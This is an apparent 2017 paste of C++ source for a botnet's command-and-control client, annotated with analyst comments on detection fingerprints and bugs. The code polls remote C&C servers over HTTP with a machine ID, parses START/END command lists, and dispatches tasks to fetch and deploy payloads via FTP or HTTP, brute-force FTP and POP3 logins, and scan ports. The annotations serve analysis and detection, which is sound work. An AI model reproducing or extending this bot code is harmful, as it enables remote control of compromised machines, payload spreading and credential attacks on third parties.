
Untitled

a guest Jun 8th, 2017 68 Never
  1. =========================
  2.  
  3. Control.h
  4.  
  5. =========================
  6.  
  7. #ifndef CONTROL_H
  8. #define CONTROL_H
  9.  
  10. #include "includes.h"
  11.  
  // Analyst note: command-and-control (C&C) client of the bot. It runs as a
  // ThreadClass worker: connect to one of the configured servers, fetch a
  // command list over HTTP, parse it, and dispatch deploy / brute / scan tasks
  // (see Control.cpp below). ThreadClass, DebugLog, ThreadManager and SOCKET
  // come from "includes.h", which is not part of this listing.
  12. class ControlProcClass: public ThreadClass
  13. {
  14.  
  15.     public:
  16.  
  17.         ControlProcClass();
  18.         ~ControlProcClass();
  19.  
          // Thread body: one connect / fetch / parse / execute pass.
  20.         void run();
  21.         int ConnectToServer(string hostname, int port);
  22.         int ConnectToServers();
  23.         int GetCommands();
  24.         int ResolveCommands();
  25.         int ExecuteCommands();
  26.         int returnSock();
          // NOTE(review): CommandRoutine() is declared here but no definition
          // appears in the Control.cpp listing on this page.
  27.         void CommandRoutine();
  28.         void waitKillAllThreads();
  29.  
          // Raw server reply; written by GetCommands(), read by ResolveCommands().
          // Public, so other classes can read or overwrite it.
  30.         string Received;
  31.  
  32.     private:
  33.  
          // Parallel lists filled by the constructor from CNC_SERVER_HOSTNAMES
          // and CNC_SERVER_PORTS; entry i of one is paired with entry i of the other.
  34.         vector <string> hostnames;
  35.         vector <int> ports;
  36.  
  37.         DebugLog * Log;
  38.  
  39.         ThreadManager * ThreadPool;
  40.  
          // Server most recently tried by ConnectToServers().
  41.         string Hostname;
  42.         int port;
  43.        
          // Single socket handle, overwritten by every ConnectToServer() call.
  44.         SOCKET sock;
  45.  
          // Command lines extracted between the START and END markers.
  46.         vector<string> commands;
  47.  
          // NOTE(review): not referenced anywhere in the visible Control.cpp.
  48.         int nHostnames;
  49.  
  50. };
  51.  
  52. #endif
  53.  
  54. ==============
  55.  
  56. Control.cpp
  57.  
  58. ==============
  59.  
  60. #include "includes.h"
  61.  
  62.  
  // Constructor: loads the C&C server list from the build-time constants
  // CNC_SERVER_HOSTNAMES and CNC_SERVER_PORTS (both comma-separated; their
  // values are defined outside this listing) and grabs the shared DebugLog
  // and ThreadManager instances.
  // Static-analysis hint: the log text says "CommandProcClass" although the
  // class is ControlProcClass; the literal strings in this file are stable
  // markers for matching a sample or its debug log.
  // NOTE(review): sock, port and nHostnames are not initialised here, and
  // nothing checks that the hostname and port lists have the same length.
  63. ControlProcClass::ControlProcClass() : ThreadClass()
  64. {
  65.     Log = DebugLog::initialize();
  66.     Log->writeLog(400, __LINE__, __FILE__, "Creating CommandProcClass");
  67.     string buffer;
  68.     vector <string> tokens;
  69.     buffer = CNC_SERVER_HOSTNAMES;
  70.     SplitString(buffer, hostnames, ",");
  71.     buffer = CNC_SERVER_PORTS;
  72.     SplitString(buffer, tokens, ",");
          // atoi() yields 0 for a non-numeric entry, so a malformed port becomes port 0.
  73.     for (int i = 0; i != tokens.size(); i++)
  74.     {
  75.         ports.push_back(atoi(tokens[i].c_str()));
  76.     }
  77.     Log->writeLog(400, __LINE__, __FILE__, "Set Control Variables");
  78.     ThreadPool = ThreadManager::initialize();
  79.  
  80. }
  81.  
  // Destructor: only writes a log line. No closesocket() or other cleanup of
  // `sock` is visible in this listing, so the C&C socket is left to the OS.
  82. ControlProcClass::~ControlProcClass()
  83. {
  84.     Log->writeLog(400, __LINE__, __FILE__, "Destroying ControlClass"); 
  85. }
  86.  
  // Opens a fresh connection via ConnectToServers() and returns the socket
  // handle as an int. Every call therefore produces a new outbound TCP
  // connection; the SOCKET value is narrowed to int on return.
  // NOTE(review): the result of ConnectToServers() is ignored, so the handle
  // returned here may belong to a failed connection attempt.
  87. int ControlProcClass::returnSock()
  88. {
  89.     ConnectToServers();
  90.     return sock;
  91. }
  92.  
  // Thread entry point: performs exactly one polling pass per call, in the
  // order connect -> GetCommands -> ResolveCommands -> ExecuteCommands. Any
  // repetition must come from the caller; no loop is visible here.
  // The fixed log strings ("Starting command collection routine", "Command
  // collection routing completed", ...) are useful when triaging a debug log
  // left behind by the sample.
  93. void ControlProcClass::run()
  94. {
  95.     Log = DebugLog::initialize();
  96.     Log->writeLog(400, __LINE__, __FILE__, "Starting command collection routine");
  97.     Log->writeLog(400, __LINE__, __FILE__, "Connecting to Command Servers");
  98.  
          // Empty branch, and ConnectToServers() as listed only ever returns 0,
          // so a failed connection does not stop the steps below.
  99.     if ((ConnectToServers()) == 1)
  100.     {
  101.        
  102.     }
  103.  
  104.     GetCommands();
  105.  
  106.     ResolveCommands();
  107.  
  108.     ExecuteCommands();
  109.  
  110.     Log->writeLog(400, __LINE__, __FILE__, "Command collection routing completed");
  111.  
  112.     return;
  113.  
  114. }
  115.  
  // Walks the configured server list in order and stops at the first server
  // for which ConnectToServer() does not return 2 (its failure code). Network
  // view: sequential TCP connection attempts to each configured host/port
  // until one succeeds.
  // Log forensics: the "Attempting connection" line is written only AFTER an
  // attempt has failed, and the "Connected to Command Server" line is written
  // unconditionally, even when every server failed. Both messages lack a
  // space before "on" (hostname and "on TCP port" run together).
  // Always returns 0, so callers cannot detect failure from the return value.
  116. int ControlProcClass::ConnectToServers()
  117. {
  118.  
  119.     int result = 2;
  120.     for (int i = 0; i != hostnames.size(); i++)
  121.     {
  122.        
             // NOTE(review): ports[i] is indexed by the hostname index without
             // checking that `ports` has as many entries as `hostnames`.
  123.         result = ConnectToServer(hostnames[i], ports[i]);
  124.         Hostname = hostnames[i];
  125.         port = ports[i];
  126.         if (result != 2)
  127.         {
  128.             break;
  129.         }
  130.         Log->writeLog(400, __LINE__, __FILE__,"Attempting connection to server - " + Hostname + "on TCP port " + IntToString(port));
  131.     }
  132.     Log->writeLog(400, __LINE__, __FILE__,"Connected to Command Server - " + Hostname + "on TCP port " + IntToString(port));
  133.     return 0;
  134.  
  135. }
  136.  
  // Opens a plain IPv4 TCP connection (AF_INET / SOCK_STREAM, no TLS in this
  // code) to hostname:port and stores the handle in the member `sock`.
  // Returns 0 on success and 2 on any failure; failures are logged at level
  // 200 with the GetLastError() value labelled "WSAError".
  // The `port` parameter shadows the member of the same name.
  // GetHostname() is a project helper not shown here; presumably it resolves
  // the name to an IPv4 address in network byte order - confirm.
  // NOTE(review): the previous value of `sock` is overwritten without being
  // closed, and the socket is not closed when connect() fails.
  137. int ControlProcClass::ConnectToServer(string hostname, int port)
  138. {
  139.    
  140.     int error;
  141.     string buffer;
  142.     struct sockaddr_in sin;
  143.     sock = socket(AF_INET, SOCK_STREAM, 0);
  144.     if (sock == INVALID_SOCKET)
  145.     {
  146.         error = GetLastError();
  147.         buffer = "Socket Function, WSAError: " + IntToString(error);
  148.         Log->writeLog(200, __LINE__, __FILE__, buffer);
  149.         return 2;  
  150.     }  
  151.     memset( &sin, 0, sizeof(sin) );
  152.     sin.sin_addr.s_addr = GetHostname(hostname);
  153.     sin.sin_family = AF_INET;
  154.     sin.sin_port = htons(port);
  155.     if (connect(sock, (sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
  156.     {
  157.         error = GetLastError();
  158.         buffer = "Connect Function, WSAError: " + IntToString(error);
  159.         Log->writeLog(200, __LINE__, __FILE__, buffer);
  160.         return 2;  
  161.     }
           // `sock` has not been reassigned since the check after socket(), so
           // this second INVALID_SOCKET test cannot fire on this path.
  162.     if (sock == INVALID_SOCKET)
  163.     {
  164.         error = GetLastError();
  165.         buffer = "INVALID_SOCKET error, WSAError: " + IntToString(error);
  166.         Log->writeLog(200, __LINE__, __FILE__, buffer);
  167.         return 2;  
  168.     }
           // Disabled code below: an earlier version probed the server with a
           // fixed "id=1" request and treated an HTTP 404 reply as failure.
  169.     /* string Request = "GET /control.php?id=1 HTTP/1.1\r\nHost:"+Hostname+" \r\nUser-Agent:Mozilla/4.0\r\n\r\n";
  170.     send(sock, Request.c_str(), Request.size(), 0);
  171.     char recvbuffer[4024];
  172.     recv(sock, recvbuffer, 4024, 0);
  173.     Received = recvbuffer;
  174.     vector<string> tokens;
  175.     SplitString(Received, tokens, "\n");
  176.     if (tokens[0].find("HTTP/1.1 404 Not Found") != string.npos)
  177.     {
  178.         Log->writeLog(200, __LINE__, __FILE__, "404 Error");
  179.         return 2;
  180.     }*/
  181.     return 0;
  182. }
  183.  
  // Sends one HTTP/1.1 GET for /control.php?id=<ReturnMachineID()> over the
  // socket opened by ConnectToServer() and stores the reply in `Received`.
  // Network-detection fingerprint, as built by the string below: the request
  // carries only two headers, both written without a space after the colon
  // ("Host:<name>" followed by a trailing space, and "User-Agent:Mozilla/4.0"),
  // which is unusual for real browser traffic.
  // ReturnMachineID() is defined elsewhere; how the id is derived is not
  // visible on this page.
  // NOTE(review): the send()/recv() results are ignored and the 4024-byte
  // stack buffer is neither zeroed nor NUL-terminated before being assigned to
  // a std::string, so `Received` can hold stale bytes after the real reply.
  // Only a single recv() is issued; a reply split across TCP segments is
  // truncated. Always returns 0.
  184. int ControlProcClass::GetCommands()
  185. {
  186.  
  187.     string MachineID = ReturnMachineID();
  188.     string Request = "GET /control.php?id="+MachineID+" HTTP/1.1\r\nHost:"+Hostname+" \r\nUser-Agent:Mozilla/4.0\r\n\r\n";
  189.     send(sock, Request.c_str(), Request.size(), 0);
  190.     char buffer[4024];
  191.     recv(sock, buffer, 4024, 0);
  192.     Received = buffer;
  193.     return 0;
  194.  
  195. }
  196.  
  // Extracts command lines from the raw reply in `Received`. The reply is
  // split on "\n" and scanned with a two-state flag (sCommands): a line
  // containing "START" switches collection on, a line containing "END"
  // switches it off, and every line seen while collecting is appended to
  // `commands`. Response signature for detection: a control.php reply whose
  // body carries START ... END marker lines.
  // The markers are matched as substrings over the whole reply, HTTP headers
  // included, and "END" is tested first on each line.
  // NOTE(review): `commands` is not cleared here, so entries accumulate across
  // calls. Presumably lines keep a trailing "\r" when the server uses CRLF;
  // that depends on SplitString(), which is not shown. Always returns 0.
  197. int ControlProcClass::ResolveCommands()
  198. {
  199.  
  200.     Log->writeLog(400, __LINE__, __FILE__, "Splitting command string into an array");
  201.     vector<string> tokens;
  202.     SplitString(Received, tokens, "\n");
  203.     int nCommands = 0;
  204.     int sCommands = 0;
  205.     for (int i = 0; i < tokens.size(); i++)
  206.     {
  207.         if (tokens[i].find("END") != string::npos)
  208.         {
  209.             sCommands = 0;
  210.         }
  211.         else if (sCommands == 1)
  212.         {
  213.             nCommands++;
  214.             commands.push_back(tokens[i]);
               // Each accepted command is echoed into the debug log verbatim.
  215.             Log->writeLog(400, __LINE__, __FILE__, "Found Command "+tokens[i]);
  216.         }
  217.         else if (tokens[i].find("START") != string::npos)
  218.         {
  219.             sCommands = 1;
  220.         }
  221.     }
  222.     Log->writeLog(400, __LINE__, __FILE__, "Received "+IntToString(nCommands)+" commands from control server");
  223.     return 0;
  224.  
  225. }
  226.  
  // Dispatches every entry of `commands`. Each entry is split on ";" and the
  // first field is matched by substring against four numeric codes:
  //   111 - deploy via FTP   (fields 1-4: host, file name, user name, password; port fixed to 21)
  //   112 - deploy via HTTP  (field 1: URL)
  //   201 - brute            (fields 1-4: host, two numeric values, protocol selector 21 or 110)
  //   202 - scan             (field 1: IP address)
  // The work is handed to DeployClass / BruteClass / PortsClass (defined
  // elsewhere) through Start(<name>); presumably Start() launches a worker
  // thread registered under that name - confirm against ThreadClass. The
  // function then blocks in waitKillAllThreads().
  // Incident-response view: everything here is driven by data received from
  // the C&C server, and the first field of every command is written to the
  // debug log ("Tokens: ...").
  // NOTE(review): token indexes are read without a size check; the four tests
  // are independent `if`s using find(), so one first field can match more
  // than one code; `tokens` is declared outside the loop and not cleared here
  // (whether SplitString() clears it is not visible). Always returns 0.
  227. int ControlProcClass::ExecuteCommands()
  228. {
  229.     Log->writeLog(400, __LINE__, __FILE__, "Executing Commands");
  230.     vector<string> tokens;
  231.     for (int i = 0; i != commands.size(); i++)
  232.     {
  233.         SplitString(commands[i], tokens, ";");
  234.         //
  235.         // "DEPLOY via FTP" command
  236.         //
  237.         Log->writeLog(400, __LINE__, __FILE__, "Tokens: "+tokens[0]);
  238.         if (tokens[0].find("111") != string::npos)
  239.         {
  240.             string hostname = tokens[1];
  241.             string filename = tokens[2];
  242.             string username = tokens[3];
  243.             string password = tokens[4];
  244.             DeployClass DeployFTP;
  245.             DeployFTP.setFTP(hostname, 21, username, password, filename);
  246.             DeployFTP.Start("DEPLOY_FTP");
  247.         }
  248.         //
  249.         // "DEPLOY via HTTP" command
  250.         //
  251.         if (tokens[0].find("112") != string::npos)
  252.         {
  253.             string url = tokens[1];
  254.             DeployClass DeployHTTP;
  255.             DeployHTTP.setHTTP(url);
  256.             DeployHTTP.Start("DEPLOY_HTTP");
  257.         }
  258.         // "BRUTE" command
  259.         if (tokens[0].find("201") != string::npos)
  260.         {
  261.             string hostname = tokens[1];
  262.             string usernames = tokens[2];
  263.             string passwords = tokens[3];
  264.             string protocol = tokens[4];
  265.             BruteClass Brute;
  266.             Brute.setIPAddress(hostname);
                // Only 21 and 110 are recognised; any other value leaves the
                // protocol at whatever BruteClass defaults to (not shown).
  267.             if (protocol.find("21") != string::npos)
  268.             {
  269.                 Brute.setProtocol(21);
  270.             }
  271.             else if (protocol.find("110") != string::npos)
  272.             {
  273.                 Brute.setProtocol(110);
  274.             }
                // Both fields are passed through atoi(), i.e. they are numbers,
                // not credential strings; their meaning is defined in BruteClass.
  275.             Brute.setUserPass(atoi(usernames.c_str()), atoi(passwords.c_str()));
  276.             Brute.Start("BRUTE");
  277.         }
  278.         // "SCAN" command
  279.         if (tokens[0].find("202") != string::npos)
  280.         {
  281.             Log->writeLog(400, __LINE__, __FILE__, "Found Scan Command");
  282.             string ipaddress = tokens[1];
                // tokens[1] came from a split on ";" already; this second split
                // keeps only the part before any further ";".
  283.             vector <string> tokenss;
  284.             SplitString(ipaddress, tokenss, ";");
  285.             ipaddress = tokenss[0];
  286.             Log->writeLog(400, __LINE__, __FILE__, "Executing Scan Command");
  287.             PortsClass Ports;
  288.             Ports.setIPAddress(ipaddress);
  289.             Log->writeLog(400, __LINE__, __FILE__, "Starting now");
  290.             Ports.Start("SCAN");
  291.         }
  292.        
  293.     }
  294.     waitKillAllThreads();
  295.     return 0;
  296. }
  297.  
  // Waits for, then kills, every worker registered in the shared
  // ThreadManager except the one named "CNC" and slots with an empty name.
  // Thread slots 0..returnThreadPointer() inclusive are visited in order, so
  // the call blocks until each task thread in turn has finished.
  // Log forensics: "First thread: <name>" is written for every slot, not
  // only the first, which lists the worker names in the debug log.
  // NOTE(review): the loop bound is inclusive (`<=`); whether
  // returnThreadPointer() is a last index or a count is not visible here.
  298. void ControlProcClass::waitKillAllThreads()
  299. {
  300.     Log->writeLog(400, __LINE__, __FILE__, "Being waiting section...");
  301.     string buffer;
  302.     int temp = ThreadPool->returnThreadPointer();
  303.     for (int i = 0; i <= temp; i++)
  304.     {
  305.         buffer = ThreadPool->returnThreadName(i);
  306.         Log->writeLog(400, __LINE__, __FILE__, "First thread: "+buffer);
  307.         if (buffer.compare("CNC") != 0 && !buffer.empty())
  308.         {
  309.             Log->writeLog(400, __LINE__, __FILE__, "Found thread, waiting...");
  310.             ThreadPool->waitSingleThread(i);
  311.             Log->writeLog(400, __LINE__, __FILE__, "Thread has now finished");
  312.             ThreadPool->killThread(i);
  313.         }
  314.  
  315.     }
  316.  
  317. }